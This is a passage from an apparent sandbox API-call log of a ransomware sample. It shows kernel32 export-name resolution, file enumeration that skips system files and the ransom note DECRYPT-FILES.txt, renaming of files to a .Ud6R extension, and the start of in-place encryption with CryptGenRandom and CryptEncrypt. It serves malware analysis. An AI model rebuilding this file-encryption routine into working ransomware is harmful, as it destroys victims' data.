returned="CreateJobObjectA" [0087.670] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.670] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.670] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.670] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.670] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.670] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.670] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.670] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.670] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.670] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.670] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.670] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.670] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.670] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.670] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.670] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.670] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.670] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.670] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.671] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.671] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.671] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.671] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.671] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.671] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.671] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.671] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.671] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.671] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.671] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.671] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.671] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.671] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.671] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.671] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.671] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.671] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.671] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.672] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.672] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.672] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.672] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.672] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.672] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.672] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.672] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.672] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.672] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.672] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.672] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.672] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.672] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.672] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.672] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.672] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.672] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.672] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.673] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.673] lstrlenA (lpString="DELETEATOM") returned 10 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.673] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.673] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.673] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.673] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.673] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.673] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.673] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.673] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.673] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.673] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.673] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.673] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.673] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.673] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.673] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.673] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.674] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.674] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.674] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.674] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.674] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.674] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.674] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.674] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.674] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.674] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.674] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.674] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.674] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.674] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.674] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.674] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.674] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.674] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.674] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.674] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.675] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.675] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.675] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.675] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.675] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.675] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.675] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv") returned 71 [0087.675] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv.Ud6R") returned 76 [0087.675] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgekjiguav6jn.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv.Ud6R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgekjiguav6jn.flv.ud6r"), dwFlags=0x0) returned 1 [0087.676] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.676] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.676] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.676] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97860b80, ftCreationTime.dwHighDateTime=0x1d4d145, ftLastAccessTime.dwLowDateTime=0x39856df0, ftLastAccessTime.dwHighDateTime=0x1d4d21c, ftLastWriteTime.dwLowDateTime=0x39856df0, ftLastWriteTime.dwHighDateTime=0x1d4d21c, nFileSizeHigh=0x0, nFileSizeLow=0x7d01, dwReserved0=0x0, dwReserved1=0x0, cFileName="XgwIp2mS.mkv", cAlternateFileName="")) returned 1 [0087.676] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.676] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="autorun.inf") returned 1 [0087.676] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="boot.ini") returned 1 [0087.676] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="desktop.ini") returned 1 [0087.676] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="ntuser.dat") returned 1 [0087.677] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="iconcache.db") returned 1 [0087.677] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="bootsect.bak") returned 1 [0087.677] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="ntuser.dat.log") returned 1 [0087.677] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="thumbs.db") returned 1 [0087.677] lstrcmpiW (lpString1="XgwIp2mS.mkv", lpString2="Bootfont.bin") returned 1 [0087.677] lstrlenW (lpString="XgwIp2mS.mkv") returned 12 [0087.677] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0087.677] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0087.677] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0087.677] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0087.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.677] lstrlenW (lpString="XgwIp2mS.mkv") returned 12 [0087.677] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="XgwIp2mS.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv" [0087.677] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgwip2ms.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.677] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=32001) returned 1 [0087.677] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.677] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.678] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.678] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.678] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.678] CryptEncrypt 